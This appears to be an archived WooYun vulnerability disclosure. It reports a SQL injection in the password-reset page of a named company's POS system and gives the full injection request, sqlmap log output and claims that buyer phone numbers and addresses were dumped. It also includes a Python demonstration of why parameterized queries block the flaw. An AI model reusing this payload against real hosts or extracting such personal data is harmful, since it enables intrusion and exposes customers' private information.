WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-08-18: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly. 2015-10-02: The vendor has chosen to ignore the vulnerability; details are now public.
Starting from a SQL injection in the password-reset page of a POS store-management system, I found a dozen-plus databases. Looking through their contents, they expose all kinds of Tmall C-store data: orders, reviews, and buyer information including phone numbers and addresses. This database is quite powerful (what if it turns up your home address?). The second kind is detailed data on the company's own products, a real weapon for a competitor. The third is data on the various distributors. The volume is simply too large, so only a representative portion was dumped to show that it can be done. SQL injection found at the password-reset page http://sap.karra.com.cn/Account/PwdChange.aspx:
POST /Account/PwdChange.aspx HTTP/1.1
Host: sap.karra.com.cn
Content-Length: 174
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://sap.karra.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://sap.karra.com.cn/Account/PwdChange.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

__VIEWSTATE=%2FwEPDwUKMTA1NDkzNTkwMmRkbdVCy9Kp551SUrWeHfcXBOYLkvS6b79HnY1MNZMILbo%3D&txtUserName=aaaa%27+&txtOPwd=123456&txtNPwd=123456&txtNPwd1=123456&btnSubmit=%CC%E1%BD%BB
Request packet
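As an added illustration (not code from the original report or from the vendor's system), the request body above is replayed in Python against a throwaway SQLite table: the query built by string concatenation fails to parse on the value `aaaa' `, which is the kind of database error that surfaces as HTTP 500, while the parameterized query treats the same input as plain data. The USR_TAB schema, its sample row and the benign request are constructed for the example.

```python
import sqlite3
from urllib.parse import parse_qs

# Request body copied from the report's packet (constructed test input here).
RAW_BODY = ("__VIEWSTATE=%2FwEPDwUKMTA1NDkzNTkwMmRkbdVCy9Kp551SUrWeHfcXBOYLkvS6b79HnY1MNZMILbo%3D"
            "&txtUserName=aaaa%27+&txtOPwd=123456&txtNPwd=123456&txtNPwd1=123456"
            "&btnSubmit=%CC%E1%BD%BB")


def decode_form(body):
    """URL-decode an application/x-www-form-urlencoded body into {field: value}.
    parse_qs turns '+' into a space and '%27' into a single quote."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def make_db():
    """Constructed stand-in for the real user table (schema is an assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USR_TAB (username TEXT, pwd TEXT)")
    conn.execute("INSERT INTO USR_TAB VALUES ('alice', 'secret')")
    return conn


def lookup_concatenated(conn, username, old_pwd):
    """Vulnerable pattern: user input is spliced into the SQL text."""
    sql = ("SELECT username FROM USR_TAB WHERE username='%s' AND pwd='%s'"
           % (username, old_pwd))
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username, old_pwd):
    """Hardened pattern: placeholders, so the driver never parses input as SQL."""
    sql = "SELECT username FROM USR_TAB WHERE username=? AND pwd=?"
    return conn.execute(sql, (username, old_pwd)).fetchall()


def probe(body):
    """Decode one request body and run its credentials through both query styles.
    'concatenated' is 'SQL_ERROR' when the spliced query fails to parse; on the
    real server that error is what came back as the 500 responses sqlmap counted."""
    form = decode_form(body)
    user, old_pwd = form["txtUserName"], form["txtOPwd"]
    conn = make_db()
    try:
        concat = lookup_concatenated(conn, user, old_pwd)
    except sqlite3.OperationalError:
        concat = "SQL_ERROR"
    return {"concatenated": concat,
            "parameterized": lookup_parameterized(conn, user, old_pwd)}


if __name__ == "__main__":
    print(probe(RAW_BODY))
```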
[10:59:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 379 times
[10:59:54] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\otput\sap.karra.com.cn'
The tables in the current database (sub-department tables) are far too many to go through, and the names give little hint of what each one holds.
The vendor could not be reached, or the vendor actively declined the report.